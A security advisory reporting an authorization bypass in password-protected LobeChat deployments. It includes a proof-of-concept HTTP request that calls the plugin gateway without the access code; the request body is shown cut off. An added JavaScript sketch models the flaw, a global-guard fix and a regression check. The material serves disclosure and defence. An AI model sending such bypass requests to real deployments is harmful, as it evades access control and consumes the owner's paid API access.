Description: When the application is password-protected (deployed with the ACCESS_CODE option), it is possible to access plugins without proper authorization (without the password).

Proof-of-Concept: Let's suppose that the application has been deployed with the following command:

```
sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat
```

Because ACCESS_CODE is set, access to the chat is possible only after entering the password.

However, it is possible to interact with chat plugins without entering the ACCESS_CODE. Example HTTP request:

```
POST /api/plugin/gateway HTTP/1.1
Host: localhost:3210
Content-Length: 1276

{"apiName":"checkWeatherUsingGET","arguments":"{\n \"location\": \"London\"\n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's…
```
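The failure class described above, modelled as an added sketch (not LobeChat's own code): the access-code check is wired into one route, so the plugin gateway answers without it, shown next to a single guard that runs ahead of every `/api/` route. The header name `x-access-code`, the handler table and all function names are assumptions made for the illustration; the route path, API name and `TEST123` value are taken from the request above.

```javascript
// Added sketch with hypothetical names; not LobeChat's source code.
const ACCESS_CODE_HEADER = 'x-access-code'; // assumption: header that carries the code

// Compare without returning early at the first differing character.
function sameSecret(supplied, expected) {
  let diff = supplied.length ^ expected.length;
  for (let i = 0; i < expected.length; i++) {
    diff |= expected.charCodeAt(i) ^ supplied.charCodeAt(i); // NaN coerces to 0
  }
  return diff === 0;
}

// No configured code means the deployment is open; otherwise the header must match.
function authorized(req, accessCode) {
  if (!accessCode) return true;
  return sameSecret(String(req.headers[ACCESS_CODE_HEADER] ?? ''), accessCode);
}

// Constructed stand-ins for the chat route and the plugin gateway route.
const handlers = {
  'POST /api/chat': () => ({ status: 200, body: 'chat reply' }),
  'POST /api/plugin/gateway': (req) =>
    ({ status: 200, body: `called ${JSON.parse(req.body).apiName}` }),
};

// Before: the check is wired into one route, so the gateway is reachable without it.
function dispatchPerRoute(req, accessCode) {
  const key = `${req.method} ${req.path}`;
  if (key === 'POST /api/chat' && !authorized(req, accessCode)) return { status: 401 };
  return handlers[key] ? handlers[key](req) : { status: 404 };
}

// After: one guard runs ahead of every /api/ route, including routes added later.
function dispatchGuarded(req, accessCode) {
  if (req.path.startsWith('/api/') && !authorized(req, accessCode)) return { status: 401 };
  const key = `${req.method} ${req.path}`;
  return handlers[key] ? handlers[key](req) : { status: 404 };
}

// Regression check: list every registered route that answers without the code.
function unguardedRoutes(dispatch, accessCode) {
  return Object.keys(handlers).filter((key) => {
    const [method, path] = key.split(' ');
    const req = { method, path, headers: {}, body: '{"apiName":"checkWeatherUsingGET"}' };
    return dispatch(req, accessCode).status !== 401;
  });
}

console.log(unguardedRoutes(dispatchPerRoute, 'TEST123')); // [ 'POST /api/plugin/gateway' ]
console.log(unguardedRoutes(dispatchGuarded, 'TEST123')); // []
```

A check like `unguardedRoutes`, run against the real route table in CI, flags any newly added API route that answers without the access code.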